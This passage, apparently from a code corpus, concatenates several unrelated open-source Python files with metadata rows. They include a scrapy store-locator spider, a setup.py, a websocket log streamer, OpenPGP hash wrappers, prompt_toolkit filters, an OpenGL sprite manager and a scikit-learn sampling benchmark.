input_img[k].paste(input_img_p[k], ((i - args.images_x_start) * TILE_SIZE, (j - args.images_y_start) * TILE_SIZE))
target_img.paste(target_img_p, ((i - args.images_x_start) * TILE_SIZE, (j - args.images_y_start) * TILE_SIZE))
if error_flg == 0:
imgs_num += 1
for i in range(input_img_num):
input_img[i].save("input_image%d.png" %(i))
target_img.save("target_image.png" )
print "Make Images : " + str(imgs_num - 1)
| mit | 542,470,002,385,008,260 | 39.521552 | 145 | 0.554656 | false | 3.121517 | false | false | false |
iandees/all-the-places | locations/spiders/thebarrecode.py | 1 | 1853 | # -*- coding: utf-8 -*-
import scrapy
import json
from locations.items import GeojsonPointItem
class TheBarreCodeSpider(scrapy.Spider):
name = "thebarrecode"
allowed_domains = ["thebarrecode.com"]
start_urls = (
'http://www.thebarrecode.com/',
)
def parse(self, response):
for location_url in response.xpath('//h4[@class="studio-location-name"]/a[1]/@href').extract():
yield scrapy.Request(
location_url,
callback=self.parse_location,
)
def parse_location(self, response):
properties = {
'addr_full': response.xpath('//h4[@class="studio-address"]/span[@class="street"]/text()').extract_first(),
'city': response.xpath('//h4[@class="studio-address"]/span[@class="city"]/text()').extract_first().replace(', ', ''),
'state': response.xpath('//h4[@class="studio-address"]/span[@class="state"]/text()').extract_first(),
'postcode': response.xpath('//h4[@class="studio-address"]/text()').extract_first(),
'phone': response.xpath('//h4[@class="studio-phone"]/text()').extract_first(),
'name': response.xpath('//h3[@class="studio-location-name"]/text()').extract_first(),
'ref': response.url,
'website': response.url,
}
for key in properties:
if properties[key] and isinstance(properties[key], str):
properties[key] = properties[key].strip()
lat = response.xpath('//div[@class="marker"]/@data-lat').extract_first()
if lat:
lat = float(lat)
properties['lat'] = lat
lon = response.xpath('//div[@class="marker"]/@data-lng').extract_first()
if lon:
lon = float(lon)
properties['lon'] = lon
yield GeojsonPointItem(**properties)
| mit | 1,295,321,280,042,472,000 | 40.177778 | 129 | 0.572045 | false | 3.876569 | false | false | false |
dreikanter/favesdump | setup.py | 1 | 1925 | import codecs
import os
from setuptools import setup, find_packages
import subprocess
LOCAL_PATH = os.path.dirname(os.path.abspath(__file__))
def get_desc():
"""Get long description by converting README file to reStructuredText."""
file_name = os.path.join(LOCAL_PATH, 'README.md')
if not os.path.exists(file_name):
return ''
try:
cmd = "pandoc --from=markdown --to=rst %s" % file_name
stdout = subprocess.STDOUT
output = subprocess.check_output(cmd, shell=True, stderr=stdout)
return output.decode('utf-8')
except subprocess.CalledProcessError:
print('pandoc is required for package distribution but not installed')
return codecs.open(file_name, mode='r', encoding='utf-8').read()
def get_version():
with codecs.open(os.path.join(LOCAL_PATH, 'favesdump.py'), 'r') as f:
for line in f:
if line.startswith('__version__ ='):
return line.split('=')[1].strip(' \'"')
setup(
name='favesdump',
description='last.fm faves dumper.',
version=get_version(),
license='MIT',
author='Alex Musayev',
author_email='[email protected]',
url='https://github.com/dreikanter/favesdump',
long_description=get_desc(),
platforms=['any'],
packages=find_packages(),
install_requires=[
'pyyaml',
'requests',
],
entry_points={'console_scripts': ['favesdump = favesdump:main']},
zip_safe=True,
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: System :: Archiving :: Backup',
'Topic :: Utilities',
],
dependency_links=[],
)
| mit | 2,421,500,761,861,540,000 | 30.557377 | 78 | 0.611948 | false | 3.819444 | false | false | false |
ski7777/ftcommunity-TXT | board/fischertechnik/TXT/rootfs/var/www/applog.py | 2 | 1596 | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
#
import sys, string, os, time
import asyncio
import websockets
import subprocess
import socket
FILE = "/tmp/app.log"
def notify_launcher(str):
# Create a socket (SOCK_STREAM means a TCP socket)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# Connect to server and send data
sock.connect(("localhost", 9000))
sock.sendall(bytes(str + "\n", "UTF-8"))
except socket.error as msg:
pass
finally:
sock.close()
def htmlize(s):
s = s.replace("&", "&")
s = s.replace("<", "<")
s = s.replace(">", ">")
s = s.replace("\n", "<br/>")
return s
@asyncio.coroutine
def handler(websocket, path):
with open(FILE, 'r') as fin:
line = fin.readline()
while(websocket.open):
if line:
yield from websocket.send(htmlize(line))
else:
yield from asyncio.sleep(0.01)
line = fin.readline()
asyncio.get_event_loop().stop()
if os.fork():
sys.exit(0)
time.sleep(1)
os.setsid()
# request log file creation from launcher
notify_launcher("logging-start")
# this is the server process which reads the file, monitors
# it for new contents and forwards it to the client
loop = asyncio.get_event_loop()
start_server = websockets.serve(handler, "", 8999)
websocket_server = loop.run_until_complete(start_server)
try:
loop.run_forever()
finally:
websocket_server.close()
loop.run_until_complete(websocket_server.wait_closed())
notify_launcher("logging-stop")
| gpl-3.0 | 241,455,470,784,367,900 | 22.470588 | 60 | 0.625313 | false | 3.447084 | false | false | false |
paulfurley/encryptit | encryptit/hash_algorithms.py | 1 | 2368 | #!/usr/bin/env python3
import hashlib
from .compat import OrderedDict, bytearray_or_str
from .length import Length
def decode_hash_algorithm(octet):
if not isinstance(octet, int) or not 0 <= octet < 256:
raise TypeError('Bad octet value: `{0}` of type `{1}`'.format(
octet, type(octet)))
try:
return BYTE_TO_HASH[octet]
except KeyError:
raise ValueError(
'Unknown hash algorithm `{0}`. See '
'http://tools.ietf.org/html/rfc4880#section-9.4'.format(octet))
class HashAlgorithm():
"""
9.4. Hash Algorithms
http://tools.ietf.org/html/rfc4880#section-9.4
"""
def __init__(self):
raise RuntimeError('HashAlgorithm should not be instantiated')
@classmethod
def new(cls):
return HashWrapper(cls.hash_constructor())
@classmethod
def serialize(cls):
return OrderedDict([
('name', cls.__name__),
('octet_value', HASH_TO_BYTE[cls]),
('digest_length', cls.length),
])
class HashWrapper():
def __init__(self, hash_instance):
self._h = hash_instance
def update(self, data):
return self._h.update(bytearray_or_str(data))
def digest(self):
return bytearray(self._h.digest())
def hexdigest(self):
return self._h.hexdigest()
class MD5(HashAlgorithm):
length = Length(bits=128) # 16 octets
hash_constructor = hashlib.md5
class SHA1(HashAlgorithm):
length = Length(bits=160) # 20 octets
hash_constructor = hashlib.sha1
class RIPEMD160(HashAlgorithm):
length = Length(bits=160) # 20 octets
@staticmethod
def hash_constructor():
return hashlib.new('ripemd160')
class SHA256(HashAlgorithm):
length = Length(bits=256) # 32 octets
hash_constructor = hashlib.sha256
class SHA384(HashAlgorithm):
length = Length(bits=384) # 48 octets
hash_constructor = hashlib.sha384
class SHA512(HashAlgorithm):
length = Length(bits=512) # 64 octets
hash_constructor = hashlib.sha512
class SHA224(HashAlgorithm):
length = Length(bits=224) # 28 octets
hash_constructor = hashlib.sha224
BYTE_TO_HASH = {
1: MD5,
2: SHA1,
3: RIPEMD160,
8: SHA256,
9: SHA384,
10: SHA512,
11: SHA224,
}
HASH_TO_BYTE = dict(
[(v, k) for k, v in BYTE_TO_HASH.items()]
)
| agpl-3.0 | -8,021,793,408,460,084,000 | 20.925926 | 75 | 0.622889 | false | 3.52381 | false | false | false |
tequa/ammisoft | ammimain/WinPython-64bit-2.7.13.1Zero/python-2.7.13.amd64/Lib/site-packages/prompt_toolkit/filters/cli.py | 20 | 9224 | """
Filters that accept a `CommandLineInterface` as argument.
"""
from __future__ import unicode_literals
from .base import Filter
from prompt_toolkit.enums import EditingMode
from prompt_toolkit.key_binding.vi_state import InputMode as ViInputMode
from prompt_toolkit.cache import memoized
__all__ = (
'HasArg',
'HasCompletions',
'HasFocus',
'InFocusStack',
'HasSearch',
'HasSelection',
'HasValidationError',
'IsAborting',
'IsDone',
'IsMultiline',
'IsReadOnly',
'IsReturning',
'RendererHeightIsKnown',
'InEditingMode',
# Vi modes.
'ViMode',
'ViNavigationMode',
'ViInsertMode',
'ViInsertMultipleMode',
'ViReplaceMode',
'ViSelectionMode',
'ViWaitingForTextObjectMode',
'ViDigraphMode',
# Emacs modes.
'EmacsMode',
'EmacsInsertMode',
'EmacsSelectionMode',
)
@memoized()
class HasFocus(Filter):
"""
Enable when this buffer has the focus.
"""
def __init__(self, buffer_name):
self._buffer_name = buffer_name
@property
def buffer_name(self):
" The given buffer name. (Read-only) "
return self._buffer_name
def __call__(self, cli):
return cli.current_buffer_name == self.buffer_name
def __repr__(self):
return 'HasFocus(%r)' % self.buffer_name
@memoized()
class InFocusStack(Filter):
"""
Enable when this buffer appears on the focus stack.
"""
def __init__(self, buffer_name):
self._buffer_name = buffer_name
@property
def buffer_name(self):
" The given buffer name. (Read-only) "
return self._buffer_name
def __call__(self, cli):
return self.buffer_name in cli.buffers.focus_stack
def __repr__(self):
return 'InFocusStack(%r)' % self.buffer_name
@memoized()
class HasSelection(Filter):
"""
Enable when the current buffer has a selection.
"""
def __call__(self, cli):
return bool(cli.current_buffer.selection_state)
def __repr__(self):
return 'HasSelection()'
@memoized()
class HasCompletions(Filter):
"""
Enable when the current buffer has completions.
"""
def __call__(self, cli):
return cli.current_buffer.complete_state is not None
def __repr__(self):
return 'HasCompletions()'
@memoized()
class IsMultiline(Filter):
"""
Enable in multiline mode.
"""
def __call__(self, cli):
return cli.current_buffer.is_multiline()
def __repr__(self):
return 'IsMultiline()'
@memoized()
class IsReadOnly(Filter):
"""
True when the current buffer is read only.
"""
def __call__(self, cli):
return cli.current_buffer.read_only()
def __repr__(self):
return 'IsReadOnly()'
@memoized()
class HasValidationError(Filter):
"""
Current buffer has validation error.
"""
def __call__(self, cli):
return cli.current_buffer.validation_error is not None
def __repr__(self):
return 'HasValidationError()'
@memoized()
class HasArg(Filter):
"""
Enable when the input processor has an 'arg'.
"""
def __call__(self, cli):
return cli.input_processor.arg is not None
def __repr__(self):
return 'HasArg()'
@memoized()
class HasSearch(Filter):
"""
Incremental search is active.
"""
def __call__(self, cli):
return cli.is_searching
def __repr__(self):
return 'HasSearch()'
@memoized()
class IsReturning(Filter):
"""
When a return value has been set.
"""
def __call__(self, cli):
return cli.is_returning
def __repr__(self):
return 'IsReturning()'
@memoized()
class IsAborting(Filter):
"""
True when aborting. (E.g. Control-C pressed.)
"""
def __call__(self, cli):
return cli.is_aborting
def __repr__(self):
return 'IsAborting()'
@memoized()
class IsExiting(Filter):
"""
True when exiting. (E.g. Control-D pressed.)
"""
def __call__(self, cli):
return cli.is_exiting
def __repr__(self):
return 'IsExiting()'
@memoized()
class IsDone(Filter):
"""
True when the CLI is returning, aborting or exiting.
"""
def __call__(self, cli):
return cli.is_done
def __repr__(self):
return 'IsDone()'
@memoized()
class RendererHeightIsKnown(Filter):
"""
Only True when the renderer knows it's real height.
(On VT100 terminals, we have to wait for a CPR response, before we can be
sure of the available height between the cursor position and the bottom of
the terminal. And usually it's nicer to wait with drawing bottom toolbars
until we receive the height, in order to avoid flickering -- first drawing
somewhere in the middle, and then again at the bottom.)
"""
def __call__(self, cli):
return cli.renderer.height_is_known
def __repr__(self):
return 'RendererHeightIsKnown()'
@memoized()
class InEditingMode(Filter):
"""
Check whether a given editing mode is active. (Vi or Emacs.)
"""
def __init__(self, editing_mode):
self._editing_mode = editing_mode
@property
def editing_mode(self):
" The given editing mode. (Read-only) "
return self._editing_mode
def __call__(self, cli):
return cli.editing_mode == self.editing_mode
def __repr__(self):
return 'InEditingMode(%r)' % (self.editing_mode, )
@memoized()
class ViMode(Filter):
def __call__(self, cli):
return cli.editing_mode == EditingMode.VI
def __repr__(self):
return 'ViMode()'
@memoized()
class ViNavigationMode(Filter):
"""
Active when the set for Vi navigation key bindings are active.
"""
def __call__(self, cli):
if (cli.editing_mode != EditingMode.VI
or cli.vi_state.operator_func
or cli.vi_state.waiting_for_digraph
or cli.current_buffer.selection_state):
return False
return (cli.vi_state.input_mode == ViInputMode.NAVIGATION or
cli.current_buffer.read_only())
def __repr__(self):
return 'ViNavigationMode()'
@memoized()
class ViInsertMode(Filter):
def __call__(self, cli):
if (cli.editing_mode != EditingMode.VI
or cli.vi_state.operator_func
or cli.vi_state.waiting_for_digraph
or cli.current_buffer.selection_state
or cli.current_buffer.read_only()):
return False
return cli.vi_state.input_mode == ViInputMode.INSERT
def __repr__(self):
return 'ViInputMode()'
@memoized()
class ViInsertMultipleMode(Filter):
def __call__(self, cli):
if (cli.editing_mode != EditingMode.VI
or cli.vi_state.operator_func
or cli.vi_state.waiting_for_digraph
or cli.current_buffer.selection_state
or cli.current_buffer.read_only()):
return False
return cli.vi_state.input_mode == ViInputMode.INSERT_MULTIPLE
def __repr__(self):
return 'ViInsertMultipleMode()'
@memoized()
class ViReplaceMode(Filter):
def __call__(self, cli):
if (cli.editing_mode != EditingMode.VI
or cli.vi_state.operator_func
or cli.vi_state.waiting_for_digraph
or cli.current_buffer.selection_state
or cli.current_buffer.read_only()):
return False
return cli.vi_state.input_mode == ViInputMode.REPLACE
def __repr__(self):
return 'ViReplaceMode()'
@memoized()
class ViSelectionMode(Filter):
def __call__(self, cli):
if cli.editing_mode != EditingMode.VI:
return False
return bool(cli.current_buffer.selection_state)
def __repr__(self):
return 'ViSelectionMode()'
@memoized()
class ViWaitingForTextObjectMode(Filter):
def __call__(self, cli):
if cli.editing_mode != EditingMode.VI:
return False
return cli.vi_state.operator_func is not None
def __repr__(self):
return 'ViWaitingForTextObjectMode()'
@memoized()
class ViDigraphMode(Filter):
def __call__(self, cli):
if cli.editing_mode != EditingMode.VI:
return False
return cli.vi_state.waiting_for_digraph
def __repr__(self):
return 'ViDigraphMode()'
@memoized()
class EmacsMode(Filter):
" When the Emacs bindings are active. "
def __call__(self, cli):
return cli.editing_mode == EditingMode.EMACS
def __repr__(self):
return 'EmacsMode()'
@memoized()
class EmacsInsertMode(Filter):
def __call__(self, cli):
if (cli.editing_mode != EditingMode.EMACS
or cli.current_buffer.selection_state
or cli.current_buffer.read_only()):
return False
return True
def __repr__(self):
return 'EmacsInsertMode()'
@memoized()
class EmacsSelectionMode(Filter):
def __call__(self, cli):
return (cli.editing_mode == EditingMode.EMACS
and cli.current_buffer.selection_state)
def __repr__(self):
return 'EmacsSelectionMode()'
| bsd-3-clause | 5,422,360,678,701,781,000 | 22.351899 | 78 | 0.602125 | false | 3.830565 | false | false | false |
GitExl/DoomPath | src/nav/area.py | 1 | 2673 | from util.rectangle import Rectangle
class Area(object):
"""
A navigation area.
This describes a rectangle in which movement is freely possible. Connections to other
navigation areas allow pathfinding throughout a map.
"""
__slots__ = (
'rect',
'z',
'sector',
'flags',
'plane',
'connections',
'elements',
'inside_rect',
'index',
'path',
'visited'
)
# Sides of a navigation area.
SIDE_TOP = 0
SIDE_RIGHT = 1
SIDE_BOTTOM = 2
SIDE_LEFT = 3
SIDE_RANGE = [SIDE_TOP, SIDE_RIGHT, SIDE_BOTTOM, SIDE_LEFT]
SIDE_RANGE_OPPOSITE = [SIDE_BOTTOM, SIDE_LEFT, SIDE_TOP, SIDE_RIGHT]
def __init__(self, x1, y1, x2, y2, z):
# Position and size.
self.rect = Rectangle(x1, y1, x2, y2)
# Average Z location of this area. If the area has a slope, this
# should not be used.
self.z = z
# Can refer to a sector index to which this navigation area is linked. If the
# sector's floor or ceiling moves, this area will need to be updated along with it.
self.sector = None
# Flags, taken from a NavElement object.
self.flags = 0
# A plane describing the surface of this area.
self.plane = None
# Connection objects leading into other navigation areas.
self.connections = []
# For internal use, to track elements belonging to this area.
self.elements = []
self.inside_rect = Rectangle()
self.index = -1
self.path = False
self.visited = False
def get_side(self, side):
"""
Returns the start and end coordinates of a side of this area.
"""
if side == Area.SIDE_TOP:
return self.rect.left, self.rect.top, self.rect.right, self.rect.top
elif side == Area.SIDE_RIGHT:
return self.rect.right, self.rect.top, self.rect.right, self.rect.bottom
elif side == Area.SIDE_BOTTOM:
return self.rect.left, self.rect.bottom, self.rect.right, self.rect.bottom
elif side == Area.SIDE_LEFT:
return self.rect.left, self.rect.top, self.rect.left, self.rect.bottom
return None
def __repr__(self):
return 'area {}, z {}, sector {}, width {}, height {}, plane {}, flags {}, connections {}'.format(self.rect, self.z, self.sector, self.rect.get_width(), self.rect.get_height(), self.plane, self.flags, len(self.connections)) | bsd-2-clause | -7,160,699,094,409,025,000 | 29.386364 | 232 | 0.555556 | false | 3.995516 | false | false | false |
Gato-X/NotYourData | gameowfication/sprites.py | 1 | 12620 | """
The MIT License (MIT)
Copyright (c) 2015 Guillermo Romero Franco (AKA Gato)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from glcompat import *
from profiler import profile
import numpy as N
import math
import libs.transformations as T
from gltools import *
#from OpenGL.arrays import vbo
from libs.sortedcontainers.sortedlist import SortedList
_floats_per_vertex = 6
class SpriteTexture:
def __init__(self, surface_size):
self._surface = pygame.Surface((surface_size,surface_size), flags=pygame.SRCALPHA)
self._texture = Texture(smoothing=True)
self._texture.setFromSurface(self._surface)
self._vbo_change_low = 1000000
self._vbo_change_high = 0
self.reset()
def getSurface(self):
return self._surface
# note vbo_index is the GLOBAL TILE NUMBER
# that is, not numbered within the texture
def setTainted(self, img = False, vbo_index=None):
if img:
self._img_tainted = True
if vbo_index is not None:
self._vbo_change_low = min(self._vbo_change_low, vbo_index)
self._vbo_change_high = max(self._vbo_change_high, vbo_index+1)
def reset(self):
self._img_tainted = False
self._vbo_change_low = 1000000
self._vbo_change_high = 0
def isImageTainted(self):
return self._img_tainted
def isVboTainted(self):
t = self._vbo_change_high > self._vbo_change_low
return t
def updateGlTexture(self):
if self._img_tainted:
self._texture.update(self._surface)
self._img_tainted = False
def bind(self, loc):
return self._texture.bind(0,loc)
class SpriteManager:
def __init__(self, tile_size=64):
self._tile_size = tile_size
self._texture_size = 1024
self._max_textures = 5
self._tile_rows_in_texture = self._texture_size / tile_size
self._free_tiles = SortedList()
self._textures = []
self._total_tiles = 0
self._sprites = {}
self._top_sprite_id = 0
self._total_tiles_per_texture = int(self._tile_rows_in_texture**2)
self._vbo_index_bytes_per_texture = self._total_tiles_per_texture * 6 * _floats_per_vertex * ctypes.sizeof(ctypes.c_uint16)
self._max_tiles = self._total_tiles_per_texture *self._max_textures
self.initBuffers()
def initBuffers(self):
self._vao = glGenVertexArray()
glBindVertexArray(self._vao)
self._shader = R.getShaderProgram("sprites")
self._texture_loc = self._shader.getUniformPos("texture0")
# 1 vectors of 3 for vertex coords
# 1 vector of 2 for texture coords
# 1 float for alpha
# = 6 floats = _floats_per_vertex
# x 4 points per quad
self._data = N.zeros((self._max_tiles * 4, _floats_per_vertex),dtype="f")
# 6 indices (2 tris) per quad
indices = N.empty((self._max_tiles,6), dtype=N.uint16)
j = 0
for i in xrange(self._max_tiles):
ind = indices[i,:]
ind[0] = j+0
ind[1] = j+1
ind[2] = j+2
ind[3] = j+0
ind[4] = j+2
ind[5] = j+3
j+=4;
self._vertices_vbo = vbo.VBO(self._data.ravel(),usage=GL_DYNAMIC_DRAW)
self._vertices_vbo.bind()
stride = fsize * _floats_per_vertex
glEnableVertexAttribArray(self._shader.attr_position)
glVertexAttribPointer(self._shader.attr_position, 3, GL_FLOAT, False, stride, None)
glEnableVertexAttribArray(self._shader.attr_tc)
glVertexAttribPointer(self._shader.attr_tc, 2, GL_FLOAT, False, stride, ctypes.c_void_p(3 * fsize))
self._shader.getAttribPos("alpha",True)
glEnableVertexAttribArray(self._shader.attr_alpha)
glVertexAttribPointer(self._shader.attr_alpha, 1, GL_FLOAT, False, stride, ctypes.c_void_p(5*fsize))
self._indices_vbo = vbo.VBO(indices.ravel(), target=GL_ELEMENT_ARRAY_BUFFER,usage=GL_STATIC_DRAW)
self._indices_vbo.bind()
glBindVertexArray(0)
# creates a new texture and pushes all new tiles
# into the _free_tiles list
def newTexture(self):
texture_surface_id = len(self._textures)
texture = SpriteTexture(self._texture_size)
self._textures.append(texture) #[texture_surf, texture,False,0,0])
ty = 0
for y in xrange(self._tile_rows_in_texture):
tx = 0
for x in xrange(self._tile_rows_in_texture): # #cols = #rows
self._free_tiles.add((texture_surface_id, (ty,tx), self._total_tiles))
tx += self._tile_size
self._total_tiles += 1
ty += self._tile_size
def getFreeTile(self):
try:
tile = self._free_tiles.pop(0)
except:
self.newTexture() # create more tiles
tile = self._free_tiles.pop(0)
return tile
def setTileAlpha(self, tile, alpha):
texture_surf_id, tile_pos, tile_num = tile
d = self._data[4*tile_num:4*tile_num+4]
d[0:4,5] = alpha
self._textures[texture_surf_id].setTainted(vbo_index=tile_num)
def setTileGraphics(self, tile, src_tile_coord, surf, alpha):
texture_surf_id, (ty,tx), tile_num = tile
src_x = src_tile_coord[0] * self._tile_size
src_y = src_tile_coord[1] * self._tile_size
ts = self._tile_size
# blit texture onto it
tex = self._textures[texture_surf_id]
texture_surf = tex.getSurface()# texture surface
texture_surf.fill((0,0,0,0), rect=(tx,ty,ts,ts) )
texture_surf.blit(surf, (tx,ty), area=(src_x,src_y,ts,ts))
# setup the vbo data
u0 = float(tx) / self._texture_size
u1 = float(tx+ts) / self._texture_size
v0 = 1.0-float(ty) / self._texture_size
v1 = 1.0-float(ty+ts) / self._texture_size
d = self._data[4*tile_num:4*tile_num+4]
d[0][3:6] = (u0,v0, alpha)
d[1][3:6] = (u0,v1, alpha)
d[2][3:6] = (u1,v1, alpha)
d[3][3:6] = (u1,v0, alpha)
tex.setTainted(img=True, vbo_index=tile_num)
def setTileTransform(self, tile, src_tile_coord, transform_info):
texture_surf_id, tile_pos, tile_num = tile
dx,dy,p0,px,py = transform_info
x0 = dx * src_tile_coord[0]
y0 = dy * src_tile_coord[1]
d = self._data[4*tile_num:4*tile_num+4]
vx = px - p0
vy = py - p0
p0 = p0 + vx*x0 + vy*y0
d[0][0:3] = p0
d[1][0:3] = p0 + vy * dy
d[2][0:3] = p0 + vx * dx + vy * dy
d[3][0:3] = p0 + vx * dx
self._textures[texture_surf_id].setTainted(vbo_index=tile_num)
def getTransformInfo(self, surf_w, surf_h, xform,centered):
ts = self._tile_size
tiles_w = int(math.ceil(float(surf_w)/ts))
tiles_h = int(math.ceil(float(surf_h)/ts))
p0 = N.array((0,0,0),dtype="f")
px = N.array((surf_w,0,0),dtype="f")
py = N.array((0,surf_h,0),dtype="f")
if centered is not None:
dp = N.array((surf_w*0.5,surf_h*0.5,0),dtype="f")
p0 -= dp
px -= dp
py -= dp
if xform is not None:
xr = xform[0:3,0:3]
xt = xform[0:3,3]
p0 = N.dot(xr,p0)+xt
px = N.dot(xr,px)+xt
py = N.dot(xr,py)+xt
dx = 1.0/tiles_w
dy = 1.0/tiles_h
return dx,dy,p0,px,py
def _newSpriteHlp(self, surface, alpha, xform=None, centered=None):
try:
surface.get_width()
except:
surface = R.loadSurface(surface)
ts = self._tile_size
w,h = surface.get_width(), surface.get_height()
tiles_x = int(math.ceil(float(w)/ts))
tiles_y = int(math.ceil(float(h)/ts))
transform_info = self.getTransformInfo(w,h,xform,centered)
sprite_tiles = []
for y in xrange(tiles_y):
for x in xrange(tiles_x):
tile = self.getFreeTile()
self.setTileGraphics(tile, (x,y), surface, alpha )
self.setTileTransform(tile, (x,y), transform_info )
sprite_tiles.append(tile)
return (sprite_tiles,(w,h),alpha,xform,centered)
def newSprite(self, surface, alpha=1.0, xform=None, centered=None):
try:
surface.get_width()
except:
surface = R.loadSurface(surface,False)
s = self._newSpriteHlp(surface, alpha, xform, centered)
id = self._top_sprite_id
self._sprites[id] = s
self._top_sprite_id+=1
return id
def destroySprite(self, sid):
try:
s = self._sprites[sid]
except:
return
for tile in s[0]: # iterate over the tiles in the sprite
self.setTileAlpha(tile, 0) # this disables the rendering of the sprite
self._free_tiles.add(tile)
del self._sprites[sid]
def setSpriteAlpha(self, sid, alpha):
try:
s = self._sprites[sid]
except:
return
if s[2] == alpha:
return
for tile in s[0]: # iterate over the tiles in the sprite
self.setTileAlpha(tile, alpha)
def setSpriteTransform(self, sid, xform, centered=None):
try:
s = self._sprites[sid]
except:
return
tiles,(w,h),alpha,old_xform,old_centered = s
if centered is None:
centered = old_centered
transform_info = self.getTransformInfo(w,h,xform,centered)
ts = self._tile_size
tiles_x = int(math.ceil(float(w)/ts))
tiles_y = int(math.ceil(float(h)/ts))
i = 0
for y in xrange(tiles_y):
for x in xrange(tiles_x):
self.setTileTransform(tiles[i], (x,y), transform_info )
i+=1
def setSpriteGraphics(self, sid, surface):
try:
s = self._sprites[sid]
except:
return
sprite_tiles,(w,h),alpha,xform,centered = s
for tile in sprite_tiles: # iterate over the tiles in the sprite
self._free_tiles.add(tile)
self.setTileAlpha(tile, 0) # this disables the rendering of the sprite
s = self._newSpriteHlp(surface, alpha, xform, centered)
self._sprites[sid] = s
@profile
def draw(self, scene):
glEnable(GL_BLEND)
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
glDisable(GL_DEPTH_TEST)
self._shader.begin()
scene.uploadMatrices(self._shader)
glBindVertexArray(self._vao)
ofs = 0
self._indices_vbo.bind()
for t in self._textures:
t.updateGlTexture()
if t.isVboTainted():
fac = _floats_per_vertex * 4 * fsize # bytes/quad
self._vertices_vbo.bind()
glBufferSubData(
GL_ARRAY_BUFFER,
fac * t._vbo_change_low,
fac * (t._vbo_change_high - t._vbo_change_low),
self._data[t._vbo_change_low*4:].ravel().ctypes.data_as(ctypes.c_void_p)
)
self._indices_vbo.bind()
t.bind(self._texture_loc)
glDrawElements(GL_TRIANGLES,self._total_tiles_per_texture*6, GL_UNSIGNED_SHORT, ctypes.c_void_p(ofs))
ofs += self._vbo_index_bytes_per_texture
t.reset()
glBindVertexArray(0)
self._shader.end()
glEnable(GL_DEPTH_TEST)
glDisable(GL_BLEND)
| mit | 520,867,695,182,356,860 | 28.280742 | 131 | 0.57916 | false | 3.425624 | false | false | false |
shyamalschandra/scikit-learn | benchmarks/bench_sample_without_replacement.py | 397 | 8008 | """
Benchmarks for sampling without replacement of integer.
"""
from __future__ import division
from __future__ import print_function
import gc
import sys
import optparse
from datetime import datetime
import operator
import matplotlib.pyplot as plt
import numpy as np
import random
from sklearn.externals.six.moves import xrange
from sklearn.utils.random import sample_without_replacement
def compute_time(t_start, delta):
mu_second = 0.0 + 10 ** 6 # number of microseconds in a second
return delta.seconds + delta.microseconds / mu_second
def bench_sample(sampling, n_population, n_samples):
gc.collect()
# start time
t_start = datetime.now()
sampling(n_population, n_samples)
delta = (datetime.now() - t_start)
# stop time
time = compute_time(t_start, delta)
return time
if __name__ == "__main__":
###########################################################################
# Option parser
###########################################################################
op = optparse.OptionParser()
op.add_option("--n-times",
dest="n_times", default=5, type=int,
help="Benchmark results are average over n_times experiments")
op.add_option("--n-population",
dest="n_population", default=100000, type=int,
help="Size of the population to sample from.")
op.add_option("--n-step",
dest="n_steps", default=5, type=int,
help="Number of step interval between 0 and n_population.")
default_algorithms = "custom-tracking-selection,custom-auto," \
"custom-reservoir-sampling,custom-pool,"\
"python-core-sample,numpy-permutation"
op.add_option("--algorithm",
dest="selected_algorithm",
default=default_algorithms,
type=str,
help="Comma-separated list of transformer to benchmark. "
"Default: %default. \nAvailable: %default")
# op.add_option("--random-seed",
# dest="random_seed", default=13, type=int,
# help="Seed used by the random number generators.")
(opts, args) = op.parse_args()
if len(args) > 0:
op.error("this script takes no arguments.")
sys.exit(1)
selected_algorithm = opts.selected_algorithm.split(',')
for key in selected_algorithm:
if key not in default_algorithms.split(','):
raise ValueError("Unknown sampling algorithm \"%s\" not in (%s)."
% (key, default_algorithms))
###########################################################################
# List sampling algorithm
###########################################################################
# We assume that sampling algorithm has the following signature:
# sample(n_population, n_sample)
#
sampling_algorithm = {}
###########################################################################
# Set Python core input
sampling_algorithm["python-core-sample"] = \
lambda n_population, n_sample: \
random.sample(xrange(n_population), n_sample)
###########################################################################
# Set custom automatic method selection
sampling_algorithm["custom-auto"] = \
lambda n_population, n_samples, random_state=None: \
sample_without_replacement(n_population,
n_samples,
method="auto",
random_state=random_state)
###########################################################################
# Set custom tracking based method
sampling_algorithm["custom-tracking-selection"] = \
lambda n_population, n_samples, random_state=None: \
sample_without_replacement(n_population,
n_samples,
method="tracking_selection",
random_state=random_state)
###########################################################################
# Set custom reservoir based method
sampling_algorithm["custom-reservoir-sampling"] = \
lambda n_population, n_samples, random_state=None: \
sample_without_replacement(n_population,
n_samples,
method="reservoir_sampling",
random_state=random_state)
###########################################################################
# Set custom reservoir based method
sampling_algorithm["custom-pool"] = \
lambda n_population, n_samples, random_state=None: \
sample_without_replacement(n_population,
n_samples,
method="pool",
random_state=random_state)
###########################################################################
# Numpy permutation based
sampling_algorithm["numpy-permutation"] = \
lambda n_population, n_sample: \
np.random.permutation(n_population)[:n_sample]
###########################################################################
# Remove unspecified algorithm
sampling_algorithm = dict((key, value)
for key, value in sampling_algorithm.items()
if key in selected_algorithm)
###########################################################################
# Perform benchmark
###########################################################################
time = {}
n_samples = np.linspace(start=0, stop=opts.n_population,
num=opts.n_steps).astype(np.int)
